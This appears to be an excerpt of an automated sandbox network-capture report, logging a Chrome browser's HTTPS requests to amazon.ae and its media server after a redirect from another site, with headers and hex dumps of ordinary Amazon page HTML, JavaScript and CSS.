                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p2lZVVxw3uglNoN5VhA9f4n6v3z20jxls3y6%2FiGYFL90QCJpCgJBn%2BVske%2Bj8YajRcPHpavzceydRl1RV9%2F7Mnz%2BaWmmRQjKcxUSyQ5nyvBsNbl2Sl%2FmT8wyH%2B2wpwTtN1k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8b6caf26cb6543cf-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 10
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      14192.168.2.54973752.222.236.764432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC679OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                      Referer: https://7czh8.crimiti.com/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC1506INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:40 GMT
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      x-amz-rid: APAVCQJMFK78QJEV1PMZ
                                                                                                                                                                                                                                                                      set-cookie: session-id=261-8635865-4706955; Domain=.amazon.ae; Expires=Thu, 21-Aug-2025 18:28:40 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                      set-cookie: session-id-time=2082787201l; Domain=.amazon.ae; Expires=Thu, 21-Aug-2025 18:28:40 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                      set-cookie: i18n-prefs=AED; Domain=.amazon.ae; Expires=Thu, 21-Aug-2025 18:28:40 GMT; Path=/
                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Content-Language: en-AE
                                                                                                                                                                                                                                                                      Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                      Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                      X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      Via: 1.1 ce765e91525a836efb6bc0a409334a5e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA56-P4
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 9o1_UR7ItFGeQebaZff-oXHldr3G2-biY7d4izFbYCL0K-mXkmoAmA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC8194INData Raw: 31 66 66 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 61 65 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 22 20 64 61 74 61 2d 31 39 61 78 35 61 39 6a 66 3d 22 64 69 6e 67 6f 22 3e 3c 21 2d 2d 20 73 70 3a 66 65 61 74 75 72 65 3a 68 65 61 64 2d 73 74 61 72 74 20 2d 2d 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 61 50 61 67 65 53 74 61 72 74 20 3d 20 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 3c 21 2d 2d 20 73 70 3a 65 6e 64 2d 66 65 61 74 75 72 65 3a 68 65 61 64 2d 73 74 61 72 74 20 2d 2d 3e 0a 3c 21 2d 2d 20 73 70 3a 66 65 61 74 75 72 65 3a 63 73 6d 3a 68 65 61
                                                                                                                                                                                                                                                                      Data Ascii: 1ffa<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo">... sp:feature:head-start --><head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>... sp:end-feature:head-start -->... sp:feature:csm:hea
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC13156INData Raw: 33 33 35 63 0d 0a 66 2c 6b 2c 7a 2c 6c 2c 62 26 26 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 62 26 26 2d 31 21 3d 3d 62 2e 69 6e 64 65 78 4f 66 28 22 63 73 61 3a 22 29 29 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 63 61 28 61 29 7b 76 61 72 20 62 3d 68 2e 75 65 5f 63 73 6d 5f 6d 61 72 6b 65 72 73 7c 7c 7b 7d 2c 63 3b 66 6f 72 28 63 20 69 6e 20 62 29 62 5b 76 5d 28 63 29 26 26 79 28 63 2c 61 2c 46 2c 62 5b 63 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 62 2c 63 29 7b 63 3d 63 7c 7c 68 3b 69 66 28 63 5b 56 5d 29 63 5b 56 5d 28 61 2c 62 2c 21 31 29 3b 65 6c 73 65 20 69 66 28 63 5b 57 5d 29 63 5b 57 5d 28 22 6f 6e 22 2b 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 61 2c 62 2c 63 29 7b 63 3d 63 7c 7c 68 3b 69 66 28 63 5b 58 5d 29 63 5b 58 5d 28 61
                                                                                                                                                                                                                                                                      Data Ascii: 335cf,k,z,l,b&&"string"===typeof b&&-1!==b.indexOf("csa:"))}}function ca(a){var b=h.ue_csm_markers||{},c;for(c in b)b[v](c)&&y(c,a,F,b[c])}function A(a,b,c){c=c||h;if(c[V])c[V](a,b,!1);else if(c[W])c[W]("on"+a,b)}function T(a,b,c){c=c||h;if(c[X])c[X](a
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC16384INData Raw: 33 66 66 61 0d 0a 74 54 72 61 6e 73 66 6f 72 6d 33 64 28 29 7d 2c 74 6f 75 63 68 53 63 72 6f 6c 6c 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 2f 57 69 6e 64 6f 77 73 68 6f 70 7c 61 6e 64 72 6f 69 64 7c 4f 53 20 28 5b 35 2d 39 5d 7c 5b 31 2d 39 5d 5b 30 2d 39 5d 2b 29 28 5f 5b 30 2d 39 5d 7b 31 2c 32 7d 29 2b 20 6c 69 6b 65 20 4d 61 63 20 4f 53 20 58 7c 53 4f 46 54 57 41 52 45 3d 28 5b 35 2d 39 5d 7c 5b 31 2d 39 5d 5b 30 2d 39 5d 2b 29 28 2e 5b 30 2d 39 5d 7b 31 2c 32 7d 29 2b 2e 2a 44 45 56 49 43 45 3d 69 50 68 6f 6e 65 7c 43 68 72 6f 6d 65 7c 53 69 6c 6b 7c 46 69 72 65 66 6f 78 7c 54 72 69 64 65 6e 74 2e 2b 3f 3b 20 54 6f 75 63 68 2f 69 29 7d 2c 69 6f 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 2f 4f 53
                                                                                                                                                                                                                                                                      Data Ascii: 3ffatTransform3d()},touchScrolling:function(){return e(/Windowshop|android|OS ([5-9]|[1-9][0-9]+)(_[0-9]{1,2})+ like Mac OS X|SOFTWARE=([5-9]|[1-9][0-9]+)(.[0-9]{1,2})+.*DEVICE=iPhone|Chrome|Silk|Firefox|Trident.+?; Touch/i)},ios:function(){return e(/OS
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC16384INData Raw: 0d 0a 33 66 66 38 0d 0a 6d 65 64 69 61 2d 63 61 72 64 20 2e 61 2d 63 61 72 64 75 69 2d 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 32 30 70 78 3b 74 6f 70 3a 30 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 2e 61 2d 63 61 72 64 75 69 2e 67 77 2d 6d 65 64 69 61 2d 63 61 72 64 20 2e 61 2d 63 61 72 64 75 69 2d 68 65 61 64 65 72 20 68 33 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 34 30 70 78 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 2e 61 2d 63 61 72 64 75 69 2e 67 77 2d 6d 65 64 69 61 2d 63 61 72 64 20 2e 61 2d 63 61 72 64 75 69 2d 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 32 30 70 78 3b 62 6f 74 74 6f 6d 3a 30 7d 2e 67 77
                                                                                                                                                                                                                                                                      Data Ascii: 3ff8media-card .a-cardui-header{margin-top:20px;padding:0 20px;top:0}.gw-card-layout .a-cardui.gw-media-card .a-cardui-header h3{margin-right:340px}.gw-card-layout .a-cardui.gw-media-card .a-cardui-footer{margin-bottom:20px;padding:0 20px;bottom:0}.gw
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC6400INData Raw: 0d 0a 31 38 66 36 0d 0a 3b 62 26 26 28 68 5b 61 5d 3d 62 29 7d 29 3b 6c 26 26 63 28 61 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6c 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 22 2b 61 29 3b 62 26 26 21 68 5b 61 5d 26 26 28 68 5b 61 5d 3d 62 29 7d 29 7d 64 2e 68 72 65 66 3d 65 2e 75 72 6c 50 61 74 68 2b 22 3f 22 2b 67 28 68 29 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3b 69 66 28 30 3e 62 29 72 65 74 75 72 6e 7b 75 72 6c 50 61 74 68 3a 61 2c 71 75 65 72 79 50 61 72 61 6d 73 3a 7b 7d 7d 3b 76 61 72 20 64 3d 7b 7d 2c 65 3d 61 2e 73 75 62 73 74 72 69 6e 67 28 62 2b 31 29 2e 73 70 6c 69 74 28 22 5c 78 32 36 22 29 3b 63 28 65 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                                                                                                                      Data Ascii: 18f6;b&&(h[a]=b)});l&&c(a,function(a){var b=l.getAttribute("data-"+a);b&&!h[a]&&(h[a]=b)})}d.href=e.urlPath+"?"+g(h)},m=function(a){var b=a.indexOf("?");if(0>b)return{urlPath:a,queryParams:{}};var d={},e=a.substring(b+1).split("\x26");c(e,function(a){
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC12792INData Raw: 33 31 66 30 0d 0a 2c 20 73 68 6f 65 73 2c 20 77 61 74 63 68 65 73 2c 20 66 75 72 6e 69 74 75 72 65 2c 20 68 6f 6d 65 20 61 6e 64 20 6b 69 74 63 68 65 6e 20 67 6f 6f 64 73 2c 20 62 65 61 75 74 79 2c 20 70 65 72 73 6f 6e 61 6c 20 63 61 72 65 2c 20 67 72 6f 63 65 72 79 2c 20 67 6f 75 72 6d 65 74 20 66 6f 6f 64 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 69 74 65 6c 69 6e 6b 73 73 65 61 72 63 68 62 6f 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 6b 58 70 6c 77 49 51 74 7a 34 73 4d 44 6e 70 45 51 78 66 38 5f 63 6c 33 57 55 51 54 4e 36 65 6f 50 37 74 63 4e 63 77 6e 45 67 22 3e 0a 3c 6c 69
                                                                                                                                                                                                                                                                      Data Ascii: 31f0, shoes, watches, furniture, home and kitchen goods, beauty, personal care, grocery, gourmet food."><meta name="google" content="nositelinkssearchbox"><meta name="google-site-verification" content="BkXplwIQtz4sMDnpEQxf8_cl3WUQTN6eoP7tcNcwnEg"><li
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC9594INData Raw: 32 35 37 32 0d 0a 2c 72 65 66 65 72 72 65 72 3a 6d 3f 76 2e 72 65 66 65 72 72 65 72 2e 73 70 6c 69 74 28 22 3f 22 29 5b 30 5d 3a 76 2e 72 65 66 65 72 72 65 72 2c 74 69 74 6c 65 3a 76 2e 74 69 74 6c 65 7d 2c 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 7c 7c 7b 7d 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 54 5b 65 5d 3d 6e 5b 65 5d 7d 29 2c 67 28 22 73 65 74 45 6e 74 69 74 79 22 2c 7b 70 61 67 65 3a 54 7d 29 2c 6b 28 22 24 70 61 67 65 43 68 61 6e 67 65 22 2c 54 2c 7b 62 75 66 66 65 72 65 64 3a 31 7d 29 2c 74 26 26 6b 28 22 24 61 66 74 65 72 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 29 7b 6b 28 22 24 6c 6f 61 64 22 29 2c 6b 28 22 24 72 65 61 64 79 22 29 2c 6b 28 22 24 61 66 74 65 72 6c 6f 61 64 22
                                                                                                                                                                                                                                                                      Data Ascii: 2572,referrer:m?v.referrer.split("?")[0]:v.referrer,title:v.title},Object.keys(n||{}).forEach(function(e){T[e]=n[e]}),g("setEntity",{page:T}),k("$pageChange",T,{buffered:1}),t&&k("$afterPageTransition")}function A(){k("$load"),k("$ready"),k("$afterload"
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC9594INData Raw: 32 35 37 32 0d 0a 6e 67 3a 22 2b 6b 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3d 68 5b 6b 5d 3b 0a 69 66 28 63 2e 69 73 6c 7c 7c 67 29 7b 76 61 72 20 64 3d 22 63 73 61 3a 22 2b 61 3b 65 28 61 2c 64 2c 76 6f 69 64 20 30 2c 62 29 3b 66 28 22 61 74 22 2c 64 29 7d 65 6c 73 65 20 65 28 61 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 62 29 7d 29 7d 29 2c 61 2e 75 65 5f 63 73 61 5f 73 73 5f 74 61 67 7c 7c 6c 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 2e 6f 6e 28 22 24 63 73 6d 54 61 67 3a 22 2b 61 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 74 61 67 26 26 63 2e 74 61 67 28 61 29 3b 28 63 2e 69 73 6c 7c 7c 67 29 26 26 66 28 22 61 74 22 2c 22 63 73 61 3a 22 2b 61 29 7d 2c 7b 62 75 66 66 65 72 65 64 3a 31 7d 29 7d 29 29 7d 29 3b 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2572ng:"+k,function(b){var a=h[k];if(c.isl||g){var d="csa:"+a;e(a,d,void 0,b);f("at",d)}else e(a,void 0,void 0,b)})}),a.ue_csa_ss_tag||l.forEach(function(a){b.on("$csmTag:"+a,function(){c.tag&&c.tag(a);(c.isl||g)&&f("at","csa:"+a)},{buffered:1})}))});
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC1556INData Raw: 36 30 64 0d 0a 20 20 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 0a 20 20 20 20 6e 61 6d 65 3d 22 73 69 74 65 2d 73 65 61 72 63 68 22 0a 20 20 20 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 0a 20 20 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 65 66 74 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6e 61 76 2d 73 65 61 72 63 68 2d 64 72 6f 70 64 6f 77 6e 2d 63 61 72 64 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 73 65 61 72 63 68 2d 73 63 6f 70 65 20 6e 61 76 2d 73 70 72 69 74 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 73 65 61 72 63 68 2d 66 61 63 61 64 65 22 20 64 61 74 61 2d 76 61 6c 75 65 3d 22 73 65 61 72 63 68 2d 61 6c 69 61 73 3d 61 70 73 22 3e 0a
                                                                                                                                                                                                                                                                      Data Ascii: 60d method="GET" name="site-search" role="search" > <div class="nav-left"> <div id="nav-search-dropdown-card"> <div class="nav-search-scope nav-sprite"> <div class="nav-search-facade" data-value="search-alias=aps">
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC16384INData Raw: 37 31 65 63 0d 0a 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 73 65 61 72 63 68 2d 61 6c 69 61 73 3d 62 65 61 75 74 79 22 3e 42 65 61 75 74 79 20 26 20 50 65 72 73 6f 6e 61 6c 20 43 61 72 65 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 73 65 61 72 63 68 2d 61 6c 69 61 73 3d 73 74 72 69 70 62 6f 6f 6b 73 22 3e 42 6f 6f 6b 73 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 73 65 61 72 63 68 2d 61 6c 69 61 73 3d 63 6f 6d 70 75 74 65 72 73 22 3e 43 6f 6d 70 75 74 65 72 20 26 20 41 63 63 65 73 73 6f 72 69 65 73 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 73 65 61 72 63 68 2d 61 6c 69 61 73 3d 65
                                                                                                                                                                                                                                                                      Data Ascii: 71ec <option value="search-alias=beauty">Beauty & Personal Care</option> <option value="search-alias=stripbooks">Books</option> <option value="search-alias=computers">Computer & Accessories</option> <option value="search-alias=e


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      15192.168.2.549739151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:40 UTC1373OUTGET /images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC696INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 211782
                                                                                                                                                                                                                                                                      Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 01f1638f-3aea-4d89-b02a-c28787bc4cff
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 04 Jun 2020 16:54:02 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Wed, 27 Jul 2044 21:00:44 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 1386882
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:41 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200149-IAD, cache-nyc-kteb1890060-NYC
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 7d 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 68 31 2c 68 32 2c 68 33 2c 68 34 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 68 31 2c 68 32 2c 68 33 2c 68 34 7b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 6f 70 74 69 6d 69 7a 65 4c 65 67 69 62 69 6c 69 74 79 7d 68 31 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 68 32 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 68 33 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 68 34 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 68 31 2e 61 2d 73 70 61 63 69 6e 67 2d 6e 6f 6e 65 2c 68
                                                                                                                                                                                                                                                                      Data Ascii: button,input,select,textarea{font-family:inherit}h1,h2,h3,h4,h5,h6{padding:0;margin:0}h1,h2,h3,h4{padding-bottom:4px}h1,h2,h3,h4{text-rendering:optimizeLegibility}h1:last-child,h2:last-child,h3:last-child,h4:last-child{padding-bottom:0}h1.a-spacing-none,h
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 61 6e 74 7d 2e 61 2d 74 65 78 74 2d 6e 6f 72 6d 61 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 2d 74 65 78 74 2d 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 2d 74 65 78 74 2d 69 74 61 6c 69 63 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 2d 74 65 78 74 2d 75 6e 64 65 72 6c 69 6e 65 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72
                                                                                                                                                                                                                                                                      Data Ascii: ant}.a-text-normal{font-weight:400!important;font-style:normal!important;text-transform:none!important;text-decoration:none!important}.a-text-bold{font-weight:700!important}.a-text-italic{font-style:italic!important}.a-text-underline{text-decoration:under
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 2d 73 69 7a 65 2d 62 61 73 65 2d 70 6c 75 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 2d 73 69 7a 65 2d 6d 65 64 69 75 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 2d 73 69 7a 65 2d 6d 65 64 69 75 6d 7b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 6f 70 74 69 6d 69 7a 65 4c 65 67 69 62 69 6c 69 74 79 7d 2e 61 2d 73 69 7a 65 2d 6c 61 72 67 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 21 69 6d 70 6f 72 74 61
